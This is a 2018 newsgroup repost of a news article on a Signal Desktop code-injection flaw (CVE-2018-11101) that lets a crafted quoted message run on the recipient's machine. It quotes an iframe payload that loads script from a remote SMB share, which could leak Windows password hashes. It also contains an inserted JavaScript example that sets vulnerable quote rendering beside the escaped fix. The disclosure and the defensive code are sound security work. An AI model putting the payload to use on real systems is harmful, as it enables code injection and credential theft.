Rocksolid Light

Bug in Signal

Path: rocksolid2!def3!.POSTED!not-for-mail
From: guest@retrobbs.rocksolidbbs.com (Guest)
Newsgroups: rocksolid.shared.security
Subject: Bug in Signal
Date: Fri, 18 May 2018 15:19:46 -0400
Organization: Dancing elephants
Lines: 119
Message-ID: <pdn90h$kd4$1@def3.retrobbs.com>
Reply-To: Guest <guest@retrobbs.rocksolidbbs.com>
NNTP-Posting-Host: def2.lan
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
X-Trace: def3.retrobbs.com 1526671185 20900 192.168.1.235 (18 May 2018 19:19:45 GMT)
X-Complaints-To: usenet@def3.retrobbs.com
NNTP-Posting-Date: Fri, 18 May 2018 19:19:45 +0000 (UTC)
User-Agent: FUDforum 3.0.7
X-FUDforum: e2245c1d60cd2fa7de3270a53d877d47 <1528>

https://thehackernews.com/2018/05/signal-desktop-hacking.html

Another severe flaw in Signal desktop app lets hackers steal
your chats in plaintext
Wednesday, May 16, 2018 Swati Khandelwal

For the second time in less than a week, users of the
popular end-to-end encrypted Signal messaging app have to
update their desktop applications once again to patch
another severe code injection vulnerability.

Discovered Monday by the same team of security researchers,
the newly discovered vulnerability poses the same threat as
the previous one, allowing remote attackers to inject
malicious code on the recipients' Signal desktop app just by
sending them a message--without requiring any user
interaction.

To understand more about the first code injection
vulnerability (CVE-2018-10994), you can read our previous
article covering how researchers found the Signal flaw and
how it works.

The only difference between the two is that the previous
flaw resides in the function that handles links shared in
the chat, whereas the new vulnerability (CVE-2018-11101)
exists in a different function that handles the validation
of quoted messages, i.e., quoting a previous message in a
reply.
In other words, to exploit the newly patched bug on
vulnerable versions of Signal desktop app, all an attacker
needs to do is send a malicious HTML/javascript code as a
message to the victim, and then quote/reply to that same
message with any random text.

If the victim receives this quoted message containing the
malicious payload on its vulnerable Signal desktop app, it
will automatically execute the payload, without requiring
any user interaction.
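The injection path described above comes down to one rendering sink: the quoted message text is inserted into the app's HTML without escaping. The following is an added illustration, not Signal's code, showing that pattern beside the standard fix; the quote object shape, the function names and the sample message body are assumptions (the sample reuses the iframe path quoted later in the article).

```javascript
// Added illustration (not Signal's code): how a quote preview becomes a
// code-injection sink when message text is spliced into HTML unescaped,
// and the standard fix of escaping untrusted text before rendering.

// Constructed sample: the earlier message body that is later quoted.
// The UNC path is the one shown in the researchers' example.
const QUOTED_BODY = '<iframe src="\\\\DESKTOP-XXXXX\\Temp\\test.html"></iframe>';

// Vulnerable pattern: untrusted text concatenated into markup. When this
// string reaches innerHTML, the renderer parses the tag and loads it.
function renderQuoteUnsafe(quote) {
  return '<div class="quote"><span class="author">' + quote.author +
         '</span><p>' + quote.text + '</p></div>';
}

// Escape the five characters HTML treats specially so the text is shown
// verbatim instead of being parsed as markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Hardened pattern: every untrusted field is escaped before it meets markup.
function renderQuoteSafe(quote) {
  return '<div class="quote"><span class="author">' + escapeHtml(quote.author) +
         '</span><p>' + escapeHtml(quote.text) + '</p></div>';
}

// Defender check: does the rendered markup still contain a raw tag taken
// from the untrusted input? True means the sink is injectable.
function containsRawTag(html, tagName) {
  return new RegExp('<' + tagName + '[\\s>]', 'i').test(html);
}

const quote = { author: 'Guest', text: QUOTED_BODY };
console.log(containsRawTag(renderQuoteUnsafe(quote), 'iframe')); // true
console.log(containsRawTag(renderQuoteSafe(quote), 'iframe'));   // false
```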

Exploiting Signal Code Injection to Steal Plaintext Chats

Until now the proof-of-concept payloads used to demonstrate
code injection vulnerabilities in Signal were limited to
embedding an HTML iFrame, or image/video/audio tags onto the
victim's desktop app.

However, researchers have now managed to craft a new PoC
exploit that could allow remote attackers to successfully
steal all Signal conversations of the victims in plaintext
just by sending them a message.

This hack literally defeats the purpose of an end-to-end
encrypted messaging app, allowing remote attackers to easily
get hold of users' plain-text conversations without
breaking the encryption.

Attackers Could Possibly Steal Windows Password As Well

What's worse?

In their blog post, the researchers also indicated that an
attacker could even include files from a remote SMB share
using an HTML iFrame, which can be abused to steal NTLMv2
hashed passwords for Windows users.

"In the Windows operative system, the CSP fails to
prevent remote inclusion of resources via the SMB protocol.
In this case, remote execution of JavaScript can be achieved
by referencing the script in an SMB share as the source of
an iframe tag, for example: <iframe
src=\\DESKTOP-XXXXX\Temp\test.html> and then replying to
it," the researchers explain.

Though they haven't claimed anything about this form of
attack, I speculate that if an attacker can exploit code
injection to force Windows OS to initiate an automatic
authentication with the attacker-controlled SMB server using
single sign-on, it would eventually hand over the victim's
username and NTLMv2 hashed password to the attackers,
potentially allowing them to gain access to the victim's
system.

We have seen how the same attack technique was recently
exploited using a vulnerability in Microsoft Outlook,
disclosed last month.

I cannot verify this claim at this moment, but we are in
contact with a few security researchers to confirm this.

Researchers--Iván Ariel Barrera Oro, Alfredo Ortega,
Juliano Rizzo, and Matt Bryant--responsibly reported the
vulnerability to Signal, and its developers have patched the
vulnerability with the release of Signal desktop version
1.11.0 for Windows, macOS, and Linux users.

However, The Hacker News has learned that Signal developers
had already identified this issue as part of a comprehensive
fix to the first vulnerability before the researchers found
it and reported it.

Signal app has an auto-update mechanism, so most users should
already have the update installed. You can read this guide
to check whether you are running an updated version of Signal.

And if you don't, you should immediately update your Signal
for desktop as soon as possible, since now the vulnerability
poses a severe risk of getting your secret conversations
exposed in plaintext to attackers and further severe
consequences.

Technical Writer, Security Blogger and IT Analyst. She is a
Technology Enthusiast with a keen eye on the Cyberspace and
other tech related developments.

Posted on: def2.i2p
